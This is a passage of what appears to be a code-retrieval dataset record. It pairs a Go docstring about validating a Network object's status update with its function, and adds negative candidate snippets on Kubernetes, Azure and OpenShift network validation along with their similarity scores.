field.Invalid(field.NewPath(\"Cluster\", \"Spec\", \"ClusterNetwork\", \"Services\", \"CIDRBlocks\"), serviceCIDR, \"DNSServiceIP must reside within the associated cluster serviceCIDR\"))\n\t\t}\n\n\t\t// AKS only supports .10 as the last octet for the DNSServiceIP.\n\t\t// Refer to: https://learn.microsoft.com/en-us/azure/aks/configure-kubenet#create-an-aks-cluster-with-system-assigned-managed-identities\n\t\ttargetSuffix := \".10\"\n\t\tif dnsIP != nil && !strings.HasSuffix(dnsIP.String(), targetSuffix) {\n\t\t\tallErrs = append(allErrs, field.Invalid(field.NewPath(\"Spec\", \"DNSServiceIP\"), *m.Spec.DNSServiceIP, fmt.Sprintf(\"must end with %q\", targetSuffix)))\n\t\t}\n\t}\n\n\tif errs := validatePrivateEndpoints(m.Spec.VirtualNetwork.Subnet.PrivateEndpoints, []string{m.Spec.VirtualNetwork.Subnet.CIDRBlock}, field.NewPath(\"Spec\", \"VirtualNetwork.Subnet.PrivateEndpoints\")); len(errs) > 0 {\n\t\tallErrs = append(allErrs, errs...)\n\t}\n\n\tif len(allErrs) > 0 {\n\t\treturn kerrors.NewAggregate(allErrs.ToAggregate().Errors())\n\t}\n\treturn nil\n}", "func (m *KafkaNetworkPolicyRules) Validate() error {\n\treturn m.validate(false)\n}", "func (in *VirtualNetworkRuleStatus) DeepCopy() *VirtualNetworkRuleStatus {\n\tif in == nil {\n\t\treturn nil\n\t}\n\tout := new(VirtualNetworkRuleStatus)\n\tin.DeepCopyInto(out)\n\treturn out\n}", "func (d CheckPodNetwork) Check() types.DiagnosticResult {\n\td.res = types.NewDiagnosticResult(CheckPodNetworkName)\n\n\tpluginName, ok, err := util.GetOpenShiftNetworkPlugin(d.ClusterNetworkClient)\n\tif err != nil {\n\t\td.res.Error(\"DPodNet1001\", err, fmt.Sprintf(\"Checking network plugin failed. Error: %s\", err))\n\t\treturn d.res\n\t}\n\tif !ok {\n\t\td.res.Warn(\"DPodNet1002\", nil, \"Skipping pod connectivity test. Reason: Not using openshift network plugin.\")\n\t\treturn d.res\n\t}\n\n\tlocalPods, nonlocalPods, err := util.GetLocalAndNonLocalDiagnosticPods(d.KubeClient)\n\tif err != nil {\n\t\td.res.Error(\"DPodNet1003\", err, fmt.Sprintf(\"Getting local and nonlocal pods failed. Error: %s\", err))\n\t\treturn d.res\n\t}\n\n\tif network.IsOpenShiftMultitenantNetworkPlugin(pluginName) {\n\t\tnetnsList, err := d.NetNamespacesClient.NetNamespaces().List(metav1.ListOptions{})\n\t\tif err != nil {\n\t\t\td.res.Error(\"DPodNet1004\", err, fmt.Sprintf(\"Getting all network namespaces failed. Error: %s\", err))\n\t\t\treturn d.res\n\t\t}\n\n\t\td.vnidMap = map[string]uint32{}\n\t\tfor _, netns := range netnsList.Items {\n\t\t\td.vnidMap[netns.NetName] = netns.NetID\n\t\t}\n\t}\n\n\tlocalGlobalPods, localNonGlobalPods := util.GetGlobalAndNonGlobalPods(localPods, d.vnidMap)\n\tnonlocalGlobalPods, nonlocalNonGlobalPods := util.GetGlobalAndNonGlobalPods(nonlocalPods, d.vnidMap)\n\n\td.checkSameNodePodToPodConnection(localGlobalPods, localNonGlobalPods)\n\td.checkDifferentNodePodToPodConnection(localGlobalPods, localNonGlobalPods, nonlocalGlobalPods, nonlocalNonGlobalPods)\n\treturn d.res\n}" ]
[ "0.66972476", "0.6420284", "0.6402876", "0.623381", "0.6194095", "0.6179858", "0.59234226", "0.59146374", "0.5855416", "0.5853569", "0.5832253", "0.5828169", "0.5795385", "0.5792761", "0.5747493", "0.5727989", "0.56904906", "0.5665054", "0.55920434", "0.55584145", "0.5537664", "0.5519835", "0.5486257", "0.5470487", "0.545128", "0.54490644", "0.5443945", "0.54352903", "0.5433978", "0.5391681", "0.5364116", "0.53559214", "0.53293246", "0.53178054", "0.5307974", "0.53001314", "0.52907795", "0.528831", "0.52844733", "0.527988", "0.52766025", "0.52756506", "0.5258501", "0.52472717", "0.5225488", "0.5219518", "0.52184945", "0.521695", "0.5215223", "0.52147996", "0.52144074", "0.51906365", "0.51859564", "0.5181419", "0.5174414", "0.5149429", "0.5145828", "0.5120394", "0.51083875", "0.5097826", "0.50895023", "0.5078016", "0.5073586", "0.50670356", "0.50345916", "0.5031753", "0.50267386", "0.5025751", "0.50193995", "0.5017498", "0.5001413", "0.49988192", "0.49749395", "0.4973029", "0.49705428", "0.49628076", "0.49538767", "0.49435154", "0.49369478", "0.491668", "0.49144295", "0.4905212", "0.49024975", "0.48993623", "0.48976395", "0.488591", "0.48857892", "0.48811802", "0.4878453", "0.48749432", "0.48703074", "0.4860755", "0.4858439", "0.48557144", "0.48504293", "0.48394537", "0.483599", "0.48333845", "0.48314145", "0.48303074" ]
0.78875095
0
ValidateNetworkStatusUpdate validates the status field of a Network object.
func ValidateNetworkStatusUpdate(newStatus, oldStatus extensionsv1alpha1.NetworkStatus) field.ErrorList { allErrs := field.ErrorList{} return allErrs }
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "func ValidateNetworkUpdate(new, old *extensionsv1alpha1.Network) field.ErrorList {\n\tallErrs := field.ErrorList{}\n\n\tallErrs = append(allErrs, apivalidation.ValidateObjectMetaUpdate(&new.ObjectMeta, &old.ObjectMeta, field.NewPath(\"metadata\"))...)\n\tallErrs = append(allErrs, ValidateNetworkSpecUpdate(&new.Spec, &old.Spec, new.DeletionTimestamp != nil, field.NewPath(\"spec\"))...)\n\tallErrs = append(allErrs, ValidateNetwork(new)...)\n\n\treturn allErrs\n}", "func ValidateNetworkStatus(spec *extensionsv1alpha1.NetworkStatus, fldPath *field.Path) field.ErrorList {\n\tallErrs := field.ErrorList{}\n\n\treturn allErrs\n}", "func ValidateNetworkSpecUpdate(new, old *extensionsv1alpha1.NetworkSpec, deletionTimestampSet bool, fldPath *field.Path) field.ErrorList {\n\tallErrs := field.ErrorList{}\n\n\tif deletionTimestampSet && !apiequality.Semantic.DeepEqual(new, old) {\n\t\tallErrs = append(allErrs, apivalidation.ValidateImmutableField(new, old, fldPath)...)\n\t\treturn allErrs\n\t}\n\n\tallErrs = append(allErrs, apivalidation.ValidateImmutableField(new.Type, old.Type, fldPath.Child(\"type\"))...)\n\tallErrs = append(allErrs, apivalidation.ValidateImmutableField(new.PodCIDR, old.PodCIDR, fldPath.Child(\"podCIDR\"))...)\n\tallErrs = append(allErrs, apivalidation.ValidateImmutableField(new.ServiceCIDR, old.ServiceCIDR, fldPath.Child(\"serviceCIDR\"))...)\n\n\treturn allErrs\n}", "func (r *NetworkReconciler) updateStatus(network *ethereumv1alpha1.Network) error {\n\tnetwork.Status.NodesCount = len(network.Spec.Nodes)\n\n\tif err := r.Status().Update(context.Background(), network); err != nil {\n\t\tr.Log.Error(err, \"unable to update network status\")\n\t\treturn err\n\t}\n\n\treturn nil\n}", "func (n *Network) ValidateUpdate(old runtime.Object) error {\n\tvar allErrors field.ErrorList\n\toldNetwork := old.(*Network)\n\n\tnetworklog.Info(\"validate update\", \"name\", n.Name)\n\n\t// shared validation rules with create\n\tallErrors = append(allErrors, n.Validate()...)\n\n\t// shared validation rules with create\n\tallErrors = append(allErrors, n.Spec.NetworkConfig.ValidateUpdate(&oldNetwork.Spec.NetworkConfig)...)\n\n\t// maximum allowed nodes with different name\n\tvar maxDiff int\n\t// all old nodes names\n\toldNodesNames := map[string]bool{}\n\t// nodes count in the old network spec\n\toldNodesCount := len(oldNetwork.Spec.Nodes)\n\t// nodes count in the new network spec\n\tnewNodesCount := len(n.Spec.Nodes)\n\t// nodes with different names than the old spec\n\tdifferentNodes := map[string]int{}\n\n\tif newNodesCount > oldNodesCount {\n\t\tmaxDiff = newNodesCount - oldNodesCount\n\t}\n\n\tfor _, node := range oldNetwork.Spec.Nodes {\n\t\toldNodesNames[node.Name] = true\n\t}\n\n\tfor i, node := range n.Spec.Nodes {\n\t\tif exists := oldNodesNames[node.Name]; !exists {\n\t\t\tdifferentNodes[node.Name] = i\n\t\t}\n\t}\n\n\tif len(differentNodes) > maxDiff {\n\t\tfor nodeName, i := range differentNodes {\n\t\t\terr := field.Invalid(field.NewPath(\"spec\").Child(\"nodes\").Index(i).Child(\"name\"), nodeName, \"field is immutable\")\n\t\t\tallErrors = append(allErrors, err)\n\t\t}\n\t}\n\n\tif len(allErrors) == 0 {\n\t\treturn nil\n\t}\n\n\treturn apierrors.NewInvalid(schema.GroupKind{}, n.Name, allErrors)\n\n}", "func (m *AzureManagedControlPlane) validateVirtualNetworkUpdate(old *AzureManagedControlPlane) field.ErrorList {\n\tvar allErrs field.ErrorList\n\tif old.Spec.VirtualNetwork.Name != m.Spec.VirtualNetwork.Name {\n\t\tallErrs = append(allErrs,\n\t\t\tfield.Invalid(\n\t\t\t\tfield.NewPath(\"Spec\", \"VirtualNetwork.Name\"),\n\t\t\t\tm.Spec.VirtualNetwork.Name,\n\t\t\t\t\"Virtual Network Name is immutable\"))\n\t}\n\n\tif old.Spec.VirtualNetwork.CIDRBlock != m.Spec.VirtualNetwork.CIDRBlock {\n\t\tallErrs = append(allErrs,\n\t\t\tfield.Invalid(\n\t\t\t\tfield.NewPath(\"Spec\", \"VirtualNetwork.CIDRBlock\"),\n\t\t\t\tm.Spec.VirtualNetwork.CIDRBlock,\n\t\t\t\t\"Virtual Network CIDRBlock is immutable\"))\n\t}\n\n\tif old.Spec.VirtualNetwork.Subnet.Name != m.Spec.VirtualNetwork.Subnet.Name {\n\t\tallErrs = append(allErrs,\n\t\t\tfield.Invalid(\n\t\t\t\tfield.NewPath(\"Spec\", \"VirtualNetwork.Subnet.Name\"),\n\t\t\t\tm.Spec.VirtualNetwork.Subnet.Name,\n\t\t\t\t\"Subnet Name is immutable\"))\n\t}\n\n\t// NOTE: This only works because we force the user to set the CIDRBlock for both the\n\t// managed and unmanaged Vnets. If we ever update the subnet cidr based on what's\n\t// actually set in the subnet, and it is different from what's in the Spec, for\n\t// unmanaged Vnets like we do with the AzureCluster this logic will break.\n\tif old.Spec.VirtualNetwork.Subnet.CIDRBlock != m.Spec.VirtualNetwork.Subnet.CIDRBlock {\n\t\tallErrs = append(allErrs,\n\t\t\tfield.Invalid(\n\t\t\t\tfield.NewPath(\"Spec\", \"VirtualNetwork.Subnet.CIDRBlock\"),\n\t\t\t\tm.Spec.VirtualNetwork.Subnet.CIDRBlock,\n\t\t\t\t\"Subnet CIDRBlock is immutable\"))\n\t}\n\n\tif old.Spec.VirtualNetwork.ResourceGroup != m.Spec.VirtualNetwork.ResourceGroup {\n\t\tallErrs = append(allErrs,\n\t\t\tfield.Invalid(\n\t\t\t\tfield.NewPath(\"Spec\", \"VirtualNetwork.ResourceGroup\"),\n\t\t\t\tm.Spec.VirtualNetwork.ResourceGroup,\n\t\t\t\t\"Virtual Network Resource Group is immutable\"))\n\t}\n\treturn allErrs\n}", "func (c *networkStatuses) Update(networkStatus *batch.NetworkStatus) (result *batch.NetworkStatus, err error) {\n\tresult = &batch.NetworkStatus{}\n\terr = c.client.Put().\n\t\tNamespace(c.ns).\n\t\tResource(\"networkstatuses\").\n\t\tName(networkStatus.Name).\n\t\tBody(networkStatus).\n\t\tDo().\n\t\tInto(result)\n\treturn\n}", "func TestNetworkStatus(t *testing.T) {\n\tedgeNode := tc.GetEdgeNode(tc.WithTest(t))\n\n\targs := flag.Args()\n\tif len(args) == 0 {\n\t\tt.Fatalf(\"Usage: %s [options] state vol_name...\\n\", os.Args[0])\n\t} else {\n\t\tsecs := int(timewait.Seconds())\n\t\tstate := args[0]\n\t\tt.Log(utils.AddTimestamp(fmt.Sprintf(\"networks: '%s' expected state: '%s' secs: %d\\n\",\n\t\t\targs[1:], state, secs)))\n\n\t\tnws := args[1:]\n\t\tif nws[len(nws)-1] == \"&\" {\n\t\t\tnws = nws[:len(nws)-1]\n\t\t}\n\t\tstates = make(map[string][]nwState)\n\t\tfor _, el := range nws {\n\t\t\tstates[el] = []nwState{{state: \"no info from controller\", timestamp: time.Now()}}\n\t\t}\n\n\t\tif !*newitems {\n\t\t\t// observe existing info object and feed them into eveState object\n\t\t\tif err := tc.GetController().InfoLastCallback(edgeNode.GetID(), nil, eveState.InfoCallback()); err != nil {\n\t\t\t\tt.Fatal(err)\n\t\t\t}\n\t\t}\n\n\t\t// we are done if our eveState object is in required state\n\t\tif ready := checkState(eveState, state, nws); ready == nil {\n\n\t\t\ttc.AddProcInfo(edgeNode, checkNet(state, nws))\n\n\t\t\tcallback := func() {\n\t\t\t\tt.Errorf(\"ASSERTION FAILED (%s): expected networks %s in %s state\", time.Now().Format(time.RFC3339Nano), nws, state)\n\t\t\t\tfor k, v := range states {\n\t\t\t\t\tt.Errorf(\"\\tactual %s: %s\", k, v[len(v)-1].state)\n\t\t\t\t\tif checkNewLastState(k, state) {\n\t\t\t\t\t\tt.Errorf(\"\\thistory of states for %s:\", k)\n\t\t\t\t\t\tfor _, st := range v {\n\t\t\t\t\t\t\tt.Errorf(\"\\t\\tstate: %s received in: %s\", st.state, st.timestamp.Format(time.RFC3339Nano))\n\t\t\t\t\t\t}\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t}\n\n\t\t\ttc.WaitForProcWithErrorCallback(secs, callback)\n\n\t\t} else {\n\t\t\tt.Log(utils.AddTimestamp(ready.Error()))\n\t\t}\n\n\t\t// sleep to reduce concurrency effects\n\t\ttime.Sleep(1 * time.Second)\n\t}\n}", "func (_PermInterface *PermInterfaceTransactor) UpdateNetworkBootStatus(opts *bind.TransactOpts) (*types.Transaction, error) {\n\treturn _PermInterface.contract.Transact(opts, \"updateNetworkBootStatus\")\n}", "func ValidateIngressStatusUpdate(ingress, oldIngress *extensions.Ingress) field.ErrorList {\n\tallErrs := apivalidation.ValidateObjectMetaUpdate(&ingress.ObjectMeta, &oldIngress.ObjectMeta, field.NewPath(\"metadata\"))\n\tallErrs = append(allErrs, apivalidation.ValidateLoadBalancerStatus(&ingress.Status.LoadBalancer, field.NewPath(\"status\", \"loadBalancer\"))...)\n\treturn allErrs\n}", "func ValidateRouteStatusUpdate(route *routeapi.Route, older *routeapi.Route) field.ErrorList {\n\tallErrs := validation.ValidateObjectMetaUpdate(&route.ObjectMeta, &older.ObjectMeta, field.NewPath(\"metadata\"))\n\n\t// TODO: validate route status\n\treturn allErrs\n}", "func (v Validator) UpdateStatus(newStatus sdk.BondStatus) Validator {\n\tv.Status = newStatus\n\treturn v\n}", "func (m *PVMInstanceNetwork) Validate(formats strfmt.Registry) error {\n\treturn nil\n}", "func (in *Network_STATUS) DeepCopy() *Network_STATUS {\n\tif in == nil {\n\t\treturn nil\n\t}\n\tout := new(Network_STATUS)\n\tin.DeepCopyInto(out)\n\treturn out\n}", "func (n *Network) Validate() field.ErrorList {\n\tvar validateErrors field.ErrorList\n\n\t// validate network config (id, genesis, consensus and join)\n\tvalidateErrors = append(validateErrors, n.Spec.NetworkConfig.Validate()...)\n\n\t// validate nodes\n\tvalidateErrors = append(validateErrors, n.ValidateNodes()...)\n\n\treturn validateErrors\n}", "func (m *InterfaceConnectionStatus) Validate(formats strfmt.Registry) error {\n\tvar res []error\n\n\tif err := m.validateLabel(formats); err != nil {\n\t\tres = append(res, err)\n\t}\n\n\tif err := m.validateValue(formats); err != nil {\n\t\tres = append(res, err)\n\t}\n\n\tif len(res) > 0 {\n\t\treturn errors.CompositeValidationError(res...)\n\t}\n\treturn nil\n}", "func (m *Network) Validate(formats strfmt.Registry) error {\n\tvar res []error\n\n\tif err := m.validateID(formats); err != nil {\n\t\tres = append(res, err)\n\t}\n\n\tif err := m.validateMasterInterface(formats); err != nil {\n\t\tres = append(res, err)\n\t}\n\n\tif err := m.validateType(formats); err != nil {\n\t\tres = append(res, err)\n\t}\n\n\tif len(res) > 0 {\n\t\treturn errors.CompositeValidationError(res...)\n\t}\n\treturn nil\n}", "func ValidateNetwork(network *extensionsv1alpha1.Network) field.ErrorList {\n\tallErrs := field.ErrorList{}\n\tallErrs = append(allErrs, apivalidation.ValidateObjectMeta(&network.ObjectMeta, true, apivalidation.NameIsDNSSubdomain, field.NewPath(\"metadata\"))...)\n\tallErrs = append(allErrs, ValidateNetworkSpec(&network.Spec, field.NewPath(\"spec\"))...)\n\n\treturn allErrs\n}", "func ValidateBackupEntryStatusUpdate(newBackupEntry, oldBackupEntry *core.BackupEntry) field.ErrorList {\n\tallErrs := field.ErrorList{}\n\n\treturn allErrs\n}", "func (_PermInterface *PermInterfaceSession) UpdateNetworkBootStatus() (*types.Transaction, error) {\n\treturn _PermInterface.Contract.UpdateNetworkBootStatus(&_PermInterface.TransactOpts)\n}", "func (c *FakePodNetworkings) UpdateStatus(ctx context.Context, podNetworking *v1beta1.PodNetworking, opts v1.UpdateOptions) (*v1beta1.PodNetworking, error) {\n\tobj, err := c.Fake.\n\t\tInvokes(testing.NewRootUpdateSubresourceAction(podnetworkingsResource, \"status\", podNetworking), &v1beta1.PodNetworking{})\n\tif obj == nil {\n\t\treturn nil, err\n\t}\n\treturn obj.(*v1beta1.PodNetworking), err\n}", "func (_PermInterface *PermInterfaceTransactorSession) UpdateNetworkBootStatus() (*types.Transaction, error) {\n\treturn _PermInterface.Contract.UpdateNetworkBootStatus(&_PermInterface.TransactOpts)\n}", "func (r *Node) ValidateUpdate(old runtime.Object) error {\n\tvar allErrors field.ErrorList\n\toldNode := old.(*Node)\n\n\tnodelog.Info(\"validate update\", \"name\", r.Name)\n\n\tallErrors = append(allErrors, r.validate()...)\n\n\tif r.Spec.Network != oldNode.Spec.Network {\n\t\terr := field.Invalid(field.NewPath(\"spec\").Child(\"network\"), r.Spec.Network, \"field is immutable\")\n\t\tallErrors = append(allErrors, err)\n\t}\n\n\tif len(allErrors) == 0 {\n\t\treturn nil\n\t}\n\n\treturn apierrors.NewInvalid(schema.GroupKind{}, r.Name, allErrors)\n}", "func ValidateDaemonSetStatusUpdate(ds, oldDS *apps.DaemonSet) field.ErrorList {\n\tallErrs := apivalidation.ValidateObjectMetaUpdate(&ds.ObjectMeta, &oldDS.ObjectMeta, field.NewPath(\"metadata\"))\n\tallErrs = append(allErrs, validateDaemonSetStatus(&ds.Status, field.NewPath(\"status\"))...)\n\tif apivalidation.IsDecremented(ds.Status.CollisionCount, oldDS.Status.CollisionCount) {\n\t\tvalue := int32(0)\n\t\tif ds.Status.CollisionCount != nil {\n\t\t\tvalue = *ds.Status.CollisionCount\n\t\t}\n\t\tallErrs = append(allErrs, field.Invalid(field.NewPath(\"status\").Child(\"collisionCount\"), value, \"cannot be decremented\"))\n\t}\n\treturn allErrs\n}", "func ValidateStatefulSetStatusUpdate(statefulSet, oldStatefulSet *apps.StatefulSet) field.ErrorList {\n\tallErrs := field.ErrorList{}\n\tallErrs = append(allErrs, ValidateStatefulSetStatus(&statefulSet.Status, field.NewPath(\"status\"))...)\n\tallErrs = append(allErrs, apivalidation.ValidateObjectMetaUpdate(&statefulSet.ObjectMeta, &oldStatefulSet.ObjectMeta, field.NewPath(\"metadata\"))...)\n\t// TODO: Validate status.\n\tif apivalidation.IsDecremented(statefulSet.Status.CollisionCount, oldStatefulSet.Status.CollisionCount) {\n\t\tvalue := int32(0)\n\t\tif statefulSet.Status.CollisionCount != nil {\n\t\t\tvalue = *statefulSet.Status.CollisionCount\n\t\t}\n\t\tallErrs = append(allErrs, field.Invalid(field.NewPath(\"status\").Child(\"collisionCount\"), value, \"cannot be decremented\"))\n\t}\n\treturn allErrs\n}", "func (n *Node) UpdateStatus(status string) error {\n\tif status != \"new\" && status != \"up\" && status != \"down\" {\n\t\terr := fmt.Errorf(\"invalid node status %s\", status)\n\t\treturn err\n\t}\n\ts := &NodeStatus{Node: n, Status: status}\n\tif config.UsingDB() {\n\t\treturn s.updateNodeStatusSQL()\n\t}\n\tvar nodeDown bool\n\tif status == \"down\" {\n\t\tnodeDown = true\n\t}\n\tif nodeDown != n.isDown {\n\t\tn.isDown = nodeDown\n\t\tn.Save()\n\t}\n\ts.UpdatedAt = time.Now()\n\tds := datastore.New()\n\treturn ds.SetNodeStatus(n.Name, s)\n}", "func (m *NodePoolUpdate) Validate(formats strfmt.Registry) error {\n\tvar res []error\n\n\tif err := m.validateInstanceTypes(formats); err != nil {\n\t\tres = append(res, err)\n\t}\n\n\tif len(res) > 0 {\n\t\treturn errors.CompositeValidationError(res...)\n\t}\n\treturn nil\n}", "func (l *Libvirt) NetworkUpdate(Net Network, Command uint32, Section uint32, ParentIndex int32, XML string, Flags NetworkUpdateFlags) (err error) {\n\tvar buf []byte\n\n\targs := NetworkUpdateArgs {\n\t\tNet: Net,\n\t\tCommand: Command,\n\t\tSection: Section,\n\t\tParentIndex: ParentIndex,\n\t\tXML: XML,\n\t\tFlags: Flags,\n\t}\n\n\tbuf, err = encode(&args)\n\tif err != nil {\n\t\treturn\n\t}\n\n\n\t_, err = l.requestStream(291, constants.Program, buf, nil, nil)\n\tif err != nil {\n\t\treturn\n\t}\n\n\treturn\n}", "func ValidateNetworkSpec(spec *extensionsv1alpha1.NetworkSpec, fldPath *field.Path) field.ErrorList {\n\tallErrs := field.ErrorList{}\n\n\tif len(spec.Type) == 0 {\n\t\tallErrs = append(allErrs, field.Required(fldPath.Child(\"type\"), \"field is required\"))\n\t}\n\n\tvar cidrs []cidrvalidation.CIDR\n\n\tif len(spec.PodCIDR) == 0 {\n\t\tallErrs = append(allErrs, field.Required(fldPath.Child(\"podCIDR\"), \"field is required\"))\n\t} else {\n\t\tcidrs = append(cidrs, cidrvalidation.NewCIDR(spec.PodCIDR, fldPath.Child(\"podCIDR\")))\n\t}\n\n\tif len(spec.ServiceCIDR) == 0 {\n\t\tallErrs = append(allErrs, field.Required(fldPath.Child(\"serviceCIDR\"), \"field is required\"))\n\t} else {\n\t\tcidrs = append(cidrs, cidrvalidation.NewCIDR(spec.ServiceCIDR, fldPath.Child(\"serviceCIDR\")))\n\t}\n\n\tallErrs = append(allErrs, cidrvalidation.ValidateCIDRParse(cidrs...)...)\n\tallErrs = append(allErrs, cidrvalidation.ValidateCIDROverlap(cidrs, cidrs, false)...)\n\n\treturn allErrs\n}", "func (p *RoundRobinPool) updateStatus(serverUrl *url.URL, alive bool) {\n\tfor _, b := range p.servers {\n\t\tif b.URL.String() == serverUrl.String() {\n\t\t\tb.SetAlive(alive)\n\t\t\tbreak\n\t\t}\n\t}\n}", "func CheckNetworkStatus() error {\n\tif SunnyDay {\n\t\treturn nil\n\t}\n\treturn fmt.Errorf(\"No Internet\")\n}", "func (c *staticFabricNetworkAttachments) UpdateStatus(ctx context.Context, staticFabricNetworkAttachment *v1.StaticFabricNetworkAttachment, opts metav1.UpdateOptions) (result *v1.StaticFabricNetworkAttachment, err error) {\n\tresult = &v1.StaticFabricNetworkAttachment{}\n\terr = c.client.Put().\n\t\tNamespace(c.ns).\n\t\tResource(\"staticfabricnetworkattachments\").\n\t\tName(staticFabricNetworkAttachment.Name).\n\t\tSubResource(\"status\").\n\t\tVersionedParams(&opts, scheme.ParameterCodec).\n\t\tBody(staticFabricNetworkAttachment).\n\t\tDo(ctx).\n\t\tInto(result)\n\treturn\n}", "func statusValidate(status *DevAuthApiStatus) error {\n\tif status.Status != model.DevStatusAccepted &&\n\t\tstatus.Status != model.DevStatusRejected &&\n\t\tstatus.Status != model.DevStatusPending {\n\t\treturn ErrIncorrectStatus\n\t} else {\n\t\treturn nil\n\t}\n}", "func (m *PowerPortConnectionStatus) Validate(formats strfmt.Registry) error {\n\tvar res []error\n\n\tif err := m.validateLabel(formats); err != nil {\n\t\tres = append(res, err)\n\t}\n\n\tif err := m.validateValue(formats); err != nil {\n\t\tres = append(res, err)\n\t}\n\n\tif len(res) > 0 {\n\t\treturn errors.CompositeValidationError(res...)\n\t}\n\treturn nil\n}", "func (m *DeviceInterfaceConnectionStatus) Validate(formats strfmt.Registry) error {\n\tvar res []error\n\n\tif err := m.validateLabel(formats); err != nil {\n\t\tres = append(res, err)\n\t}\n\n\tif err := m.validateValue(formats); err != nil {\n\t\tres = append(res, err)\n\t}\n\n\tif len(res) > 0 {\n\t\treturn errors.CompositeValidationError(res...)\n\t}\n\treturn nil\n}", "func (z *Zamowienium) ValidateUpdate(tx *pop.Connection) (*validate.Errors, error) {\n\treturn validate.NewErrors(), nil\n}", "func ValidateNetworkMode(c *Config) error {\n\tif c.General.Mode == \"\" {\n\t\tc.General.Mode = DefaultNetMode\n\t}\n\tc.General.Mode = strings.ToLower(c.General.Mode)\n\tswitch c.General.Mode {\n\tcase DualStackNetMode:\n\t\tfallthrough\n\tcase IPv4NetMode:\n\t\tfallthrough\n\tcase IPv6NetMode:\n\t\tglog.Infof(\"Building cluster in mode %q\", c.General.Mode)\n\tdefault:\n\t\treturn fmt.Errorf(\"unsupported network mode %q entered\", c.General.Mode)\n\t}\n\treturn nil\n}", "func (c *AliveComponent) updateStatus() {\n\ttotal := 0\n\tfor _, neighbor := range c.neighbors {\n\t\tif neighbor.updated && neighbor.lastStatus {\n\t\t\ttotal += 1\n\t\t} else if !neighbor.updated && neighbor.status {\n\t\t\ttotal += 1\n\t\t}\n\t}\n\n\t/*\n\t * ##################################\n\t * # Game Of Life Rules evaluation. #\n\t * ##################################\n\t */\n\tc.lastStatus = c.status\n\n\tif c.status {\n\t\t// Any live cell with fewer than two live neighbours dies, as if caused\n\t\t// by underpopulation.\n\t\tif total < 2 {\n\t\t\tc.status = false\n\t\t}\n\n\t\t// Any live cell with two or three live neighbours lives on to the next\n\t\t// generation.\n\t\t// if total == 2 || total == 3 { s.status = true }\n\n\t\t// Any live cell with more than three live neighbours dies, as if by\n\t\t// overpopulation.\n\t\tif total > 3 {\n\t\t\tc.status = false\n\t\t}\n\t} else {\n\t\t// Any dead cell with exactly three live neighbours becomes a live\n\t\t// cell, as if by reproduction.\n\t\tif total == 3 {\n\t\t\tc.status = true\n\t\t}\n\t}\n\n\tc.updated = true\n}", "func ValidateProjectStatusUpdate(newProject, oldProject *core.Project) field.ErrorList {\n\tallErrs := field.ErrorList{}\n\n\tif len(oldProject.Status.Phase) > 0 && len(newProject.Status.Phase) == 0 {\n\t\tallErrs = append(allErrs, field.Forbidden(field.NewPath(\"status\").Child(\"phase\"), \"phase cannot be updated to an empty string\"))\n\t}\n\n\treturn allErrs\n}", "func ValidateProjectStatusUpdate(newProject, oldProject *core.Project) field.ErrorList {\n\tallErrs := field.ErrorList{}\n\n\tif len(oldProject.Status.Phase) > 0 && len(newProject.Status.Phase) == 0 {\n\t\tallErrs = append(allErrs, field.Forbidden(field.NewPath(\"status\").Child(\"phase\"), \"phase cannot be updated to an empty string\"))\n\t}\n\n\treturn allErrs\n}", "func (m *Move) ValidateUpdate(tx *pop.Connection) (*validate.Errors, error) {\n\treturn validate.NewErrors(), nil\n}", "func ValidateDeploymentStatusUpdate(update, old *apps.Deployment) field.ErrorList {\n\tallErrs := apivalidation.ValidateObjectMetaUpdate(&update.ObjectMeta, &old.ObjectMeta, field.NewPath(\"metadata\"))\n\tfldPath := field.NewPath(\"status\")\n\tallErrs = append(allErrs, ValidateDeploymentStatus(&update.Status, fldPath)...)\n\tif apivalidation.IsDecremented(update.Status.CollisionCount, old.Status.CollisionCount) {\n\t\tvalue := int32(0)\n\t\tif update.Status.CollisionCount != nil {\n\t\t\tvalue = *update.Status.CollisionCount\n\t\t}\n\t\tallErrs = append(allErrs, field.Invalid(fldPath.Child(\"collisionCount\"), value, \"cannot be decremented\"))\n\t}\n\treturn allErrs\n}", "func ValidateBackupBucketStatusUpdate(newStatus, oldStatus extensionsv1alpha1.BackupBucketStatus) field.ErrorList {\n\tallErrs := field.ErrorList{}\n\n\treturn allErrs\n}", "func (net *NetworkUpdateInput) UpdateNetwork() (UpdateNetworkResponse, error) {\n\n\tif status := support.DoesCloudSupports(strings.ToLower(net.Cloud.Name)); status != true {\n\t\treturn UpdateNetworkResponse{}, fmt.Errorf(common.DefaultCloudResponse + \"UpdateNetwork\")\n\t}\n\n\tswitch strings.ToLower(net.Cloud.Name) {\n\tcase \"aws\":\n\n\t\tcreds, err := common.GetCredentials(\n\t\t\t&common.GetCredentialsInput{\n\t\t\t\tProfile: net.Cloud.Profile,\n\t\t\t\tCloud: net.Cloud.Name,\n\t\t\t},\n\t\t)\n\n\t\tif err != nil {\n\t\t\treturn UpdateNetworkResponse{}, err\n\t\t}\n\t\t// I will establish session so that we can carry out the process in cloud\n\t\tsession_input := awssess.CreateSessionInput{Region: net.Cloud.Region, KeyId: creds.KeyId, AcessKey: creds.SecretAccess}\n\t\tsess := session_input.CreateAwsSession()\n\n\t\t//authorizing to request further\n\t\tauthinpt := auth.EstablishConnectionInput{Region: net.Cloud.Region, Resource: \"ec2\", Session: sess}\n\n\t\t// I will call UpdateNetwork of interface and get the things done\n\t\tserverin := awsnetwork.UpdateNetworkInput{\n\t\t\tResource: net.Catageory.Resource,\n\t\t\tAction: net.Catageory.Action,\n\t\t\tGetRaw: net.Cloud.GetRaw,\n\t\t\tNetwork: awsnetwork.NetworkCreateInput{\n\t\t\t\tName: net.Catageory.Name,\n\t\t\t\tVpcCidr: net.Catageory.VpcCidr,\n\t\t\t\tVpcId: net.Catageory.VpcId,\n\t\t\t\tSubCidrs: net.Catageory.SubCidrs,\n\t\t\t\tType: net.Catageory.Type,\n\t\t\t\tPorts: net.Catageory.Ports,\n\t\t\t\tZone: net.Catageory.Zone,\n\t\t\t},\n\t\t}\n\t\tresponse, err := serverin.UpdateNetwork(authinpt)\n\t\tif err != nil {\n\t\t\treturn UpdateNetworkResponse{}, err\n\t\t}\n\t\treturn UpdateNetworkResponse{AwsResponse: response}, nil\n\n\tcase \"azure\":\n\t\treturn UpdateNetworkResponse{DefaultResponse: common.DefaultAzResponse}, nil\n\tcase \"gcp\":\n\t\treturn 